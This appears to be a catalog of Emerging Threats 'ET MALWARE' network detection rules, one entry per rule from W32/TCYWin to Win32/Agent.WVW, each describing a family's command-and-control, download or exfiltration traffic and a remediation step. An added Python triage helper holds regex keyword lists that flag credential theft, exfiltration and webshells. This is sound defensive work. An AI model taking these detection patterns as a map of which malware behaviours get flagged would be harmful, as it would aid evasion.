
ET MALWARE W32/TCYWin.Downloader User-Agent

Description

This detection identifies HTTP requests carrying the User-Agent string used by the W32/TCYWin downloader, as observed by Rapid7’s Insight Network Sensor. Downloaders of this kind fetch and run additional malware; malicious actors use them to gain access to victim organizations.

Recommendation

Review the full HTTP request and identify the sending process on the host, since User-Agent signatures can match unusual but legitimate software. If the traffic is malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Threebyte.APT Checkin

Description

This detection identifies a check-in by the W32/Threebyte backdoor, which is tracked as APT-related, with its command-and-control server, as observed by Rapid7’s Insight Network Sensor. Malicious actors use backdoors of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question and treat it as a possible targeted intrusion: scope for other hosts contacting the same destination and involve incident response before remediating. Then rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Tobfy.Ransomware CnC Request - status.php

Description

This detection identifies a command-and-control request from the W32/Tobfy ransomware to its status.php endpoint, as observed by Rapid7’s Insight Network Sensor. Ransomware of this kind encrypts files on the host and on any reachable network shares for extortion.

Recommendation

Isolate the host from the network immediately to limit encryption of network shares, then review the alert. Determine which files and shares were encrypted, restore them from offline backups, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE W32/Tobfy.Ransomware Invalid URI CnC Request

Description

This detection identifies a command-and-control request from the W32/Tobfy ransomware that uses an invalid URI characteristic of the malware, as observed by Rapid7’s Insight Network Sensor. Ransomware of this kind encrypts files on the host and on any reachable network shares for extortion.

Recommendation

Isolate the host from the network immediately, then review the alert. Check for encrypted files on the host and on shares it could reach, restore from offline backups, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE W32/TRCrypt.ULPM Downloader CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/TRCrypt.ULPM downloader, as observed by Rapid7’s Insight Network Sensor. Downloaders of this kind fetch and run additional malware; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Trickbot C2 (networkDll module)

Description

This detection identifies command-and-control traffic from Trickbot’s networkDll module, which collects network and Active Directory domain information from the infected host, as observed by Rapid7’s Insight Network Sensor. Trickbot infections frequently precede hands-on-keyboard intrusion and ransomware deployment.

Recommendation

Review the alert in question and treat the host as a likely foothold: examine the domain for lateral movement and for other hosts beaconing to the same destination, and reset credentials for accounts that logged on to the host. Rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/TrojanSpy.MSIL Fetch Header CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/TrojanSpy.MSIL spyware carrying its Fetch Header command, as observed by Rapid7’s Insight Network Sensor. Malicious actors use spyware of this kind to gain access to victim organizations and to collect data from them.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/TrojanSpy.MSIL Fetch Time CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/TrojanSpy.MSIL spyware carrying its Fetch Time command, as observed by Rapid7’s Insight Network Sensor. Malicious actors use spyware of this kind to gain access to victim organizations and to collect data from them.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/TrojanSpy.MSIL Get New MAC CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/TrojanSpy.MSIL spyware carrying its Get New MAC command, as observed by Rapid7’s Insight Network Sensor. Malicious actors use spyware of this kind to gain access to victim organizations and to collect data from them.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/TrojanSpy.MSIL Set Done Day CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/TrojanSpy.MSIL spyware carrying its Set Done Day command, as observed by Rapid7’s Insight Network Sensor. Malicious actors use spyware of this kind to gain access to victim organizations and to collect data from them.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Trustezeb.C CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/Trustezeb.C malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/UltimateDefender.FakeAV Checkin

Description

This detection identifies a check-in from the W32/UltimateDefender fake antivirus (rogue security software) with its controller, as observed by Rapid7’s Insight Network Sensor. Fake antivirus extorts payment from the user with bogus infection warnings and is often bundled with other malware.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Upatre.Downloader Encoded Binary Download Request

Description

This detection identifies the W32/Upatre downloader requesting an encoded executable, which it decodes and runs on the host, as observed by Rapid7’s Insight Network Sensor. Upatre has historically been used to deliver banking trojans; malicious actors use downloaders of this kind to gain access to victim organizations.

Recommendation

Review the alert in question. The encoded payload will not look like an executable to simple file-type checks, so assume it was delivered and run; rebuild the host from a known, good source and have the user change their password, including any banking or financial credentials used on the host.

ET MALWARE W32/VBS.SLoad.Backdoor Initial Base64 Encoded OK Server Response

Description

This detection identifies the base64-encoded OK response a command-and-control server returns to the VBS.SLoad backdoor on its initial contact, as observed by Rapid7’s Insight Network Sensor. Because the signature matches the server’s reply, the infected host is the destination of the flagged packet, not its source.

Recommendation

Review the alert in question, noting that the host to investigate is the destination of the matched traffic. If necessary, rebuild it from a known, good source and have the user change their password.

ET MALWARE W32/Virus-Encoder Ransomware Checkin

Description

This detection identifies a command-and-control check-in by the W32/Virus-Encoder ransomware, as observed by Rapid7’s Insight Network Sensor. Ransomware of this kind encrypts files on the host and on any reachable network shares for extortion.

Recommendation

Isolate the host from the network immediately, then review the alert. Check for encrypted files on the host and on shares it could reach, restore from offline backups, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE W32/VPEYE Trojan Downloader User-Agent (VP-EYE Downloader)

Description

This detection identifies HTTP requests carrying the User-Agent string of the W32/VPEYE trojan downloader (VP-EYE Downloader), as observed by Rapid7’s Insight Network Sensor. Downloaders of this kind fetch and run additional malware; malicious actors use them to gain access to victim organizations.

Recommendation

Review the full HTTP request and identify the sending process on the host, since User-Agent signatures can match unusual but legitimate software. If the traffic is malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Vundo.Downloader Reporting User Website Session Information

Description

This detection identifies the W32/Vundo downloader reporting the user’s website session information to its controller, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain access to victim organizations and to the user’s online accounts.

Recommendation

Review the alert in question. Because the malware reports the user’s web session details, have the user change the passwords for the web services used from the host, not only their domain password, and if necessary rebuild the host from a known, good source.

ET MALWARE W32/Wadolin.Downloader CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/Wadolin downloader, as observed by Rapid7’s Insight Network Sensor. Downloaders of this kind fetch and run additional malware; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1

Description

This detection identifies an HTTP request to the WannaCry ransomware’s kill-switch domain, as observed by Rapid7’s Insight Network Sensor. WannaCry makes this request before encrypting: if the domain answers, the sample exits; if the request fails (for example because egress is blocked or forced through a proxy the malware cannot use), encryption proceeds. The request therefore indicates that a WannaCry sample has executed on the host, whether or not files were encrypted.

Recommendation

Isolate the host immediately and determine whether the kill-switch request succeeded; if it did not, expect encryption and lateral spread. WannaCry propagates over SMBv1 using the MS17-010 (EternalBlue) exploit, so verify that hosts on the network are patched and that SMBv1 is disabled, then rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 3

Description

This detection identifies another form of the HTTP request the WannaCry ransomware makes to its kill-switch domain before encrypting, as observed by Rapid7’s Insight Network Sensor. A successful reply makes the sample exit; a failed request lets encryption proceed. Either way, the request shows a WannaCry sample has run on the host.

Recommendation

Handle as for the other WannaCry kill-switch detections: isolate the host, check whether the request succeeded (a failed request means encryption proceeded), verify MS17-010 patching and SMBv1 status across the network, then rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE W32/Waterspout.APT Backdoor CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/Waterspout APT backdoor, as observed by Rapid7’s Insight Network Sensor. Malicious actors use backdoors of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question and treat it as a possible targeted intrusion: scope for other hosts contacting the same destination and involve incident response before remediating. Then rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Witch.3FA0!tr CnC Actiivty

Description

This detection identifies command-and-control activity from the W32/Witch.3FA0!tr trojan, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Witch.3FA0!tr CnC Actiivty M2

Description

This detection identifies command-and-control activity from the W32/Witch.3FA0!tr trojan (second signature variant, M2), as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Witch.3FA0!tr CnC Activity M3

Description

This detection identifies command-and-control activity from the W32/Witch.3FA0!tr trojan (third signature variant, M3), as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Woai.Dropper Config Request

Description

This detection identifies the W32/Woai dropper requesting its configuration from its controller, as observed by Rapid7’s Insight Network Sensor. Droppers of this kind install further malware on the host; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zbot.InfoStealer WindowsUpdate Connectivity Check With Opera UA

Description

This detection identifies the W32/Zbot (Zeus) information stealer checking internet connectivity against Windows Update while presenting an Opera User-Agent, as observed by Rapid7’s Insight Network Sensor. The destination is legitimate Microsoft infrastructure; the signal is the mismatched User-Agent, not the destination.

Recommendation

Review the alert in question, keeping in mind that the destination is legitimate and a connectivity check on its own does not prove infection. Correlate it with other Zbot alerts from the host; if infection is confirmed, rebuild the host from a known, good source and have the user change their passwords, including those for online banking and other sites used from the host, since Zeus targets credentials.

ET MALWARE W32/Zbot.Variant CnC Response

Description

This detection identifies a command-and-control server’s response to a W32/Zbot (Zeus) variant, as observed by Rapid7’s Insight Network Sensor. Because the signature matches the server’s reply, the infected host is the destination of the flagged packet, not its source.

Recommendation

Review the alert in question, noting that the host to investigate is the destination of the matched traffic. If necessary, rebuild it from a known, good source and have the user change their passwords, including those for online banking and other sites used from the host.

ET MALWARE W32/Zbot.Variant Fake MSIE 6.0 UA

Description

This detection identifies HTTP requests from a W32/Zbot (Zeus) variant carrying a forged Internet Explorer 6.0 User-Agent, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain access to victim organizations and to steal credentials.

Recommendation

Review the full HTTP request and identify the sending process; legacy applications and embedded devices still present MSIE 6.0 User-Agents, so confirm the source is a Windows host and the request is not from known legitimate software. If malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zemra.DDoS.Bot Variant CnC Beacon

Description

This detection identifies a command-and-control beacon from a variant of the W32/Zemra DDoS bot, as observed by Rapid7’s Insight Network Sensor. Malicious actors use bots of this kind to gain access to victim organizations and to use their hosts for attacks on third parties.

Recommendation

Review the alert in question and check the host’s outbound traffic volume, since a DDoS bot will use it to attack third parties. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Zeus.BitcoinMiner Variant CnC Beacon

Description

This detection identifies a command-and-control beacon from a W32/Zeus variant that installs a Bitcoin miner, as observed by Rapid7’s Insight Network Sensor. Malicious actors use it to hijack the host’s compute resources as well as to gain access to victim organizations.

Recommendation

Review the alert in question and look for abnormal CPU usage on the host and for other hosts beaconing to the same destination. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE W32/Zeus.InfoStealer Infection Campaign Heap.exe Request

Description

This detection identifies a request for the Heap.exe executable from a W32/Zeus (Zbot) information-stealer distribution campaign, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain access to victim organizations and to steal credentials.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zeus.InfoStealer Infection Campaign Wav.exe Request

Description

This detection identifies a request for the Wav.exe executable from a W32/Zeus (Zbot) information-stealer distribution campaign, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain access to victim organizations and to steal credentials.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zzinfor.A Retrieving Instructions From CnC Server

Description

This detection identifies the W32/Zzinfor.A trojan retrieving instructions from its command-and-control server, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Waledac Beacon Traffic Detected

Description

This detection identifies beacon traffic from the Waledac botnet, a spam-sending botnet, as observed by Rapid7’s Insight Network Sensor. Malicious actors use bots of this kind to gain access to victim organizations and to abuse their hosts as mail relays.

Recommendation

Review the alert in question and check the host’s outbound SMTP activity, since it is likely being used to send spam. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Waledac FACEPUNCH Traffic Detected

Description

This detection identifies Waledac botnet traffic recognised by its FACEPUNCH pattern, as observed by Rapid7’s Insight Network Sensor. Waledac is a spam-sending botnet; malicious actors use bots of this kind to gain access to victim organizations and to abuse their hosts as mail relays.

Recommendation

Review the alert in question and check the host’s outbound SMTP activity for spam sending. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WARP Win32/Barkiofork.A

Description

This detection identifies network activity of the Win32/Barkiofork.A trojan, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WaterDropX PRISM CnC Checkin

Description

This detection identifies a command-and-control check-in by the WaterDropX PRISM malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question and check whether the companion WaterDropX PRISM CnC Response detection also fired, which confirms the controller is live. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WaterDropX PRISM CnC Response

Description

This detection identifies a command-and-control server’s response to the WaterDropX PRISM malware, as observed by Rapid7’s Insight Network Sensor. Because the signature matches the server’s reply, the infected host is the destination of the flagged packet, not its source.

Recommendation

Review the alert in question, noting that the host to investigate is the destination of the matched traffic and that a response means the controller is live. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WBK Download from dotted-quad Host

Description

This detection identifies the download of a WBK file (a Microsoft Word backup document) from a server addressed by a bare IP address rather than a hostname, as observed by Rapid7’s Insight Network Sensor. Word documents fetched from dotted-quad hosts are a common way to deliver macro-based malware.

Recommendation

Review the alert in question and retrieve the downloaded file for analysis; check whether Word opened it and whether macros ran. If the file is malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-CLOVER Download UA

Description

This detection identifies the User-Agent used by the WEBC2-CLOVER backdoor when downloading from its controller, as observed by Rapid7’s Insight Network Sensor. WEBC2 is a family of backdoors attributed to the APT1 intrusion group; they retrieve commands embedded in web pages, and their presence indicates a targeted intrusion.

Recommendation

Review the alert in question and treat it as a targeted intrusion: scope the environment for other hosts contacting the same destination and involve incident response before remediating. Then rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-DIV UA

Description

This detection identifies the User-Agent string used by the WEBC2-DIV backdoor, one of the WEBC2 family attributed to the APT1 intrusion group, as observed by Rapid7’s Insight Network Sensor. Its presence indicates a targeted intrusion.

Recommendation

Review the alert in question and treat it as a targeted intrusion: scope for other affected hosts and involve incident response before remediating, then rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-RAVE UA

Description

This detection identifies the User-Agent string used by the WEBC2-RAVE backdoor, one of the WEBC2 family attributed to the APT1 intrusion group, as observed by Rapid7’s Insight Network Sensor. Its presence indicates a targeted intrusion.

Recommendation

Review the alert in question and treat it as a targeted intrusion: scope for other affected hosts and involve incident response before remediating, then rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-UGX User-Agent (Windows+NT+5.x) APT1

Description

This detection identifies the User-Agent string (Windows+NT+5.x) used by the WEBC2-UGX backdoor, one of the WEBC2 family attributed to the APT1 intrusion group, as observed by Rapid7’s Insight Network Sensor. Its presence indicates a targeted intrusion.

Recommendation

Review the alert in question and treat it as a targeted intrusion: scope for other affected hosts and involve incident response before remediating, then rebuild the host from a known, good source and have the user change their password.

ET MALWARE Webshell Access with Known Password Inbound - Possibly Iran-based

Description

This detection identifies an inbound HTTP request to a web server that authenticates to a known webshell using its hard-coded password, as observed by Rapid7’s Insight Network Sensor. The webshell has been attributed to a possibly Iran-based actor. A webshell is a server-side script left on a compromised web server to give the attacker remote command execution.

Recommendation

Review the alert in question. The compromised asset is the web server (the destination of the request), not a user workstation: identify the webshell file on the server, review the web server logs for how it was uploaded and for other requests from the same source, remove it, and patch or reconfigure the exploited service. Rebuild the server from a known, good source if its integrity cannot be established; rotating a user’s password does not address this.

MITRE ATT&CK Techniques

  • Server Software Component - T1505

ET MALWARE Webshell Execute Command Inbound - Possibly Iran-based M1

Description

This detection identifies an inbound HTTP request that executes a command through a known webshell on a web server, as observed by Rapid7’s Insight Network Sensor. The webshell has been attributed to a possibly Iran-based actor; this is the first of several signature variants (M1).

Recommendation

Review the alert in question; the request will usually show the command the attacker ran. As with the other webshell detections, the compromised asset is the web server: locate and remove the webshell, determine how it was planted, check what the executed commands did (new accounts, files or tools), and rebuild the server from a known, good source if its integrity cannot be established.

MITRE ATT&CK Techniques

  • Server Software Component - T1505

ET MALWARE Webshell Landing Outbound - Possibly Iran-based

Description

This detection identifies the landing page a known webshell returns to the attacker’s browser, seen as outbound traffic from the web server, as observed by Rapid7’s Insight Network Sensor. The webshell has been attributed to a possibly Iran-based actor. Because this matches the server’s reply, the compromised web server is the source of the flagged traffic.

Recommendation

Review the alert in question. The compromised asset is the web server that sent the response: locate and remove the webshell, review the server logs for how it was uploaded and for the requests that reached it, patch the exploited service, and rebuild the server from a known, good source if its integrity cannot be established.

MITRE ATT&CK Techniques

  • Server Software Component - T1505

ET MALWARE Webshell Upload Command Inbound - Possibly Iran-based

Description

This detection identifies an inbound HTTP request that uploads a file through a known webshell on a web server, as observed by Rapid7’s Insight Network Sensor. The webshell has been attributed to a possibly Iran-based actor; uploads through it typically stage additional tools or further webshells.

Recommendation

Review the alert in question. The compromised asset is the web server: retrieve the uploaded file from the server for analysis, locate and remove the webshell and anything else uploaded through it, review the server logs for how it was planted, patch the exploited service, and rebuild the server from a known, good source if its integrity cannot be established.

MITRE ATT&CK Techniques

  • Server Software Component - T1505
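
The signature names in this catalog encode who the victim is and what the first response should be, which the one-size-fits-all recommendation does not capture: the four Webshell rules above are "Inbound" to a web server (or "Outbound" from it), so the asset to contain is the server, whereas a "CnC Beacon" or "Checkin" rule points at the workstation that sent the traffic. The following Python triage helper is an added example, not part of the original page and not Rapid7 or Proofpoint code; the name tokens it keys on (Inbound, Response, Webshell, Ransomware, and so on) and its category-to-ATT&CK mapping are assumptions drawn from the rule names and technique tags listed here, not from the signatures' actual match logic, and the sample alerts are constructed with documentation IP ranges.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Added example, not Rapid7 or Proofpoint code: a triage helper for the ET
# signature names in this catalog. The name tokens it keys on and the
# category -> ATT&CK mapping are assumptions drawn from the names and the
# technique tags on this page, not from the signatures' actual match logic.


@dataclass(frozen=True)
class Alert:
    signature: str
    src_ip: str  # sender of the packet that matched the signature
    dst_ip: str  # receiver of that packet


@dataclass(frozen=True)
class Triage:
    category: str
    victim_ip: str            # the host to contain and investigate
    technique: Optional[str]  # ATT&CK technique id, where the catalog maps one
    action: str


# Most rules here fire on traffic the infected host *sends* (beacons, check-ins,
# odd User-Agents), so the victim is the source. Two name tokens invert that:
# "Inbound" rules watch attacker -> server requests (webshells, delivered HTA
# files) and "Response" rules watch C2 server -> victim replies.
_VICTIM_IS_DST = re.compile(r"\b(Inbound|Response)\b", re.IGNORECASE)

# (category, name pattern, ATT&CK technique). First match wins, so the
# categories that change the response most come first.
_CATEGORIES = [
    ("webshell", r"\bWebshell\b", "T1505"),
    ("ransomware", r"\bRansomware\b", "T1486"),
    ("connectivity-check", r"Connectivity Check", None),
    ("credential-theft", r"\b(Stealer|InfoStealer|KeyLogger|Exfil)\b", "T1041"),
    ("miner", r"\b(Bitcoin)?Miner\b", "T1496"),
    ("user-agent", r"\b(User[- ]?Agent|UA)\b", None),
    ("beacon", r"\b(CnC|C2|Beacon|Checkin)\b", "T1041"),
]
_COMPILED = [(c, re.compile(p, re.IGNORECASE), t) for c, p, t in _CATEGORIES]

_ACTIONS = {
    "webshell": "Victim is the web server: locate and remove the webshell, review "
                "the server logs for the upload and for other requests from the same "
                "source, patch the exploited service. A user password reset does not "
                "address this.",
    "ransomware": "Isolate the victim immediately, look for encrypted files and "
                  "lateral spread, restore from offline backups, then rebuild.",
    "connectivity-check": "Low confidence on its own: correlate with other alerts "
                          "from the victim before containing it.",
    "credential-theft": "Rebuild the victim and rotate every credential stored or "
                        "typed on it (browser, mail, VPN), not only the login password.",
    "miner": "Rebuild the victim and check other hosts for the same beacon.",
    "user-agent": "Confirm the sending process on the victim; unusual but legitimate "
                  "software can trip User-Agent signatures. Rebuild if confirmed.",
    "beacon": "Isolate and rebuild the victim from a known good source and have the "
              "user change their password.",
    "other": "Review the alert; rebuild the victim from a known good source if warranted.",
}


def classify(signature: str) -> Tuple[str, Optional[str]]:
    """Map an ET signature name to (category, ATT&CK technique)."""
    for category, pattern, technique in _COMPILED:
        if pattern.search(signature):
            return category, technique
    return "other", None


def victim_of(alert: Alert) -> str:
    """Pick the endpoint to contain from the direction the name implies."""
    if _VICTIM_IS_DST.search(alert.signature):
        return alert.dst_ip
    return alert.src_ip


def triage(alert: Alert) -> Triage:
    category, technique = classify(alert.signature)
    return Triage(category, victim_of(alert), technique, _ACTIONS[category])


# Constructed sample alerts using documentation address ranges; not real sensor output.
SAMPLE_ALERTS = [
    Alert("ET MALWARE Webshell Upload Command Inbound - Possibly Iran-based", "203.0.113.7", "192.0.2.10"),
    Alert("ET MALWARE W32/Zbot.Variant CnC Response", "198.51.100.5", "10.0.0.12"),
    Alert("ET MALWARE Win32/AgentTesla Variant Exfil via Telegram", "10.0.0.31", "198.51.100.80"),
    Alert("ET MALWARE W32/Quasar 1.3/Venom RAT Connectivity Check 3", "10.0.0.44", "203.0.113.9"),
]

if __name__ == "__main__":
    for a in SAMPLE_ALERTS:
        t = triage(a)
        print(f"{t.category:<18} victim={t.victim_ip:<13} technique={t.technique}  {a.signature}")
```

Running the block prints one line per sample alert. The point of the direction check is visible in the first two samples: for the webshell rule the victim is the destination web server, and for the "CnC Response" rule it is the destination workstation, while the stealer and RAT alerts point at the source host. The category order matters too: a name such as "W32/Zbot.InfoStealer WindowsUpdate Connectivity Check With Opera UA" is filed as a low-confidence connectivity check rather than as credential theft, because the check alone does not establish infection.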

ET MALWARE Wide HTA with PowerShell Execution Inbound

Description

This detection identifies an HTML Application (HTA) file delivered inbound over HTTP whose content is encoded as wide (UTF-16) characters and contains PowerShell execution, as observed by Rapid7’s Insight Network Sensor. HTA files run with the user’s privileges via mshta.exe and are a common initial-access lure; the wide encoding evades signatures that expect ASCII content.

Recommendation

Review the alert in question; the host to investigate is the destination that received the file. Check whether mshta.exe ran it and whether PowerShell executed afterwards (process creation and PowerShell script block logs). If it ran, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/44Caliber Stealer Discord Activity (POST)

Description

This detection identifies the Win32/44Caliber stealer posting harvested data to Discord, as observed by Rapid7’s Insight Network Sensor. Stealers of this kind collect credentials, tokens and other data from the host; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. Discord is a legitimate service, so blocking the destination alone is not a fix; rebuild the host from a known, good source and rotate every credential stored or entered on it (browser-saved passwords, Discord and other tokens, mail and VPN credentials), not only the user’s login password.

ET MALWARE Win32/44Caliber Stealer Variant Activity (POST)

Description

This detection identifies a variant of the Win32/44Caliber stealer posting harvested data to its collection endpoint, as observed by Rapid7’s Insight Network Sensor. Stealers of this kind collect credentials, tokens and other data from the host; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If infection is confirmed, rebuild the host from a known, good source and rotate every credential stored or entered on it, not only the user’s login password.

ET MALWARE Win32/7ev3n Ransomware Initial Checkin

Description

This detection identifies the initial check-in of the Win32/7ev3n ransomware with its controller, as observed by Rapid7’s Insight Network Sensor. Ransomware of this kind encrypts files on the host and on any reachable network shares for extortion.

Recommendation

Isolate the host from the network immediately to limit encryption of network shares, then review the alert. Check for encrypted files, restore from offline backups, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/7ev3n Ransomware Process Checkin

Description

This detection identifies a later check-in from the Win32/7ev3n ransomware to its controller, as observed by Rapid7’s Insight Network Sensor. By this stage the ransomware is running on the host; it encrypts files on the host and on any reachable network shares for extortion.

Recommendation

Isolate the host from the network immediately, then review the alert. Check for encrypted files on the host and on shares it could reach, restore from offline backups, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Adware.Agent.NSU CnC Activity

Description

This detection identifies command-and-control activity from the Win32/Adware.Agent.NSU adware, as observed by Rapid7’s Insight Network Sensor. Adware is lower severity than a backdoor but still indicates unwanted software running on the host, often installed alongside other malware.

Recommendation

Review the alert in question and remove the adware. If the host shows other signs of compromise, rebuild it from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.AAIB Variant CnC

Description

This detection identifies command-and-control traffic from a variant of the Win32/Agent.AAIB trojan, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.ACBD CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Agent.cyt (Or variant) HTTP POST Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Agent.pt User-Agent Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AgentTesla Variant Exfil via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.UWW Variant Activity (Retrieving Commands)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.UWW Variant Activity (Sending System Information)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.WMN CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.WVW CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.WVW CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

